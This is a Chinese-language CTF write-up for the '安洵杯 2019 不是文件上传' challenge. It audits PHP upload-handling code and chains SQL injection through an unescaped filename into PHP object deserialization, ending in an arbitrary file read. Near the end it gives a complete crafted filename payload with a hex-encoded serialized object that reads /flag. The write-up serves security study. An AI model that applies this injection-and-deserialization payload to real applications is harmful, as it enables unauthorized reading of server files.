信息泄露：题目源码泄露在 GitHub 上，可以直接拿到完整代码进行审计。
/**
 * Echo the raw contents of $path when $this->ifview is truthy.
 *
 * $path is neither validated nor confined to a directory, so whoever
 * controls it gets an arbitrary file read. In this class it arrives from
 * __destruct() as $this->config, i.e. straight out of the serialized data.
 *
 * Returns false when the ifview gate is closed; otherwise prints the file
 * and returns nothing.
 */
public function view_files($path){
// Loose `== False`: null, 0, "0", "" and [] all take this branch as well.
// The original author's comment says ifview is simply FALSE in the shipped
// code; a value supplied through unserialize() (b:1) reopens the function.
if ($this->ifview == False){
return False;
//The function is not yet perfect, it is not open yet.  (unreachable: placed after return)
}
$content = file_get_contents($path);
echo $content;
}
从这里读取 flag 文件：view_files() 会用 file_get_contents 读出 $path 的内容并直接 echo 出来。
/**
 * Destructor: runs automatically when the object is destroyed, which for an
 * object produced by unserialize() means at the end of the request.
 * It hands $this->config straight to view_files(), so controlling the
 * serialized `config` value controls which file gets echoed.
 */
function __destruct(){
# Resolve the configured target first, then dump it through view_files().
$target = $this->config;
$this->view_files($target);
}
}
__destruct 会在对象销毁时自动调用（反序列化产生的对象在请求结束时被销毁），它把 $this->config 原样传给 view_files()；而 config 的值可以在序列化数据里任意指定，所以被读取的路径完全可控。
接下来看入口类（处理文件上传的那个类）。
//getimagesize
$_FILES 是一个预定义的数组,用来获取通过 POST 方法上传文件的相关信息
要被序列化/反序列化的 img_ext 信息来自 $fileinfo，而 $fileinfo 由 getfile() 返回。
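/**
 * Look up the uploaded file named by $input in $_FILES and run it through check().
 *
 * @param string|null $input  key into $_FILES (the form field name)
 * @return array|null  check()'s metadata array, or null when $input is not set
 */
public function getfile($input)
{
// Initialise the result so the unset-$input path does not read an undefined
// variable (the original implicitly returned null but emitted an
// "Undefined variable $rs" notice on that path).
$rs = null;
if(isset($input)){
// NOTE(review): $_FILES[$input] itself is not checked; a missing key still
// reaches check(), which will most likely die() on the extension whitelist.
$rs = $this->check($_FILES[$input]);
}
return $rs;
}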
而信息来自check()
/**
 * Validate an upload's extension and build the metadata record for it.
 *
 * @param array $info  one entry of $_FILES; only $info["name"] is read here
 * @return array  keys: title, filename, ext, path
 *         title    = client filename with every ".<ext>" occurrence removed
 *         filename = 16-hex-char stem . "." . ext
 *         ext      = extension exactly as supplied by the client
 *         path     = $this->folder . filename
 * Calls die() (request ends) when the extension is not jpg/gif/png/jpeg.
 *
 * Security notes (this is the vulnerable target code, kept as-is):
 *  - Only the extension is checked; file content is not inspected here.
 *  - $title keeps every other byte of the client-controlled filename
 *    (quotes, commas, parentheses, '#'), which is why it works as the
 *    SQL-injection vector once it is concatenated into the INSERT shown
 *    further down this page.
 */
public function check($info)
{
// Stored name stem: 16 hex chars cut out of md5(time().uniqid()).
// time()/uniqid() are not cryptographic randomness; fine for a filename, not for a secret.
$basename = substr(md5(time().uniqid()),9,16);
$filename = $info["name"];
// Extension = text after the LAST '.', e.g. "a.jpg" -> "jpg"
// (the original comment claiming it keeps "a" was wrong). No dot -> "".
$ext = substr(strrchr($filename, '.'), 1);
$cate_exts = array("jpg","gif","png","jpeg");
// Loose in_array is harmless here: $ext is always a string and no whitelist
// entry is numeric, so the comparison is effectively exact and case-sensitive.
if(!in_array($ext,$cate_exts)){
die("Please upload the correct image file!!!
");
}
// str_replace removes EVERY ".<ext>" occurrence, not just the trailing one
// ("a.png.png" -> "a"); nothing else in the client filename is altered.
$title = str_replace(".".$ext,'',$filename);
return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
}
check() 最终返回的数组如下：
return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
}
这里一共要插入 5 个值（对应后面 payload 里的 a,'1','1','1',<序列化串> 五项）。
O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}
（注意：protected 属性名实际是 \0*\0ifview / \0*\0config，前后的 NUL 字节在页面上不可见，所以长度是 9 而不是 7；对应下面 hex 里的 002a00。）
INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")
SQL语句
implode(",", $sql_fields)：用逗号把 $sql_fields 拼接成字段列表。
$sql_fields[] = "`".$key_temp."`";
反引号中间包含的是 str_replace(chr(0).'*'.chr(0), ' ', $key) 的结果：
$key_temp = str_replace(chr(0).'*'.chr(0), ' ', $key);
替换后的key
foreach($data as $key=>$value)
data的键数组
因为这两个属性是 protected（不是 private），序列化时属性名形如 \0*\0ifview（长度 9 就是这么来的）；但上面的 str_replace 会把键名里的 \0*\0 替换成空格，而且 NUL 字节也不便原样写进文件名和 SQL 字符串，所以反序列化串改用十六进制字面量 0x... 传入（其中 002a00 就是 \0*\0）。
a','1','1','1',<需要反序列化的值>（最后一项用不带引号的 hex 字面量：0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d）
上传即可
filename="a','1','1','1',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#.png"
那么title的值为:
"a','1','1','1',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#"


![[安洵杯 2019]不是文件上传 [安洵杯 2019]不是文件上传](http://www.mshxw.com/aiimages/31/831607.png)
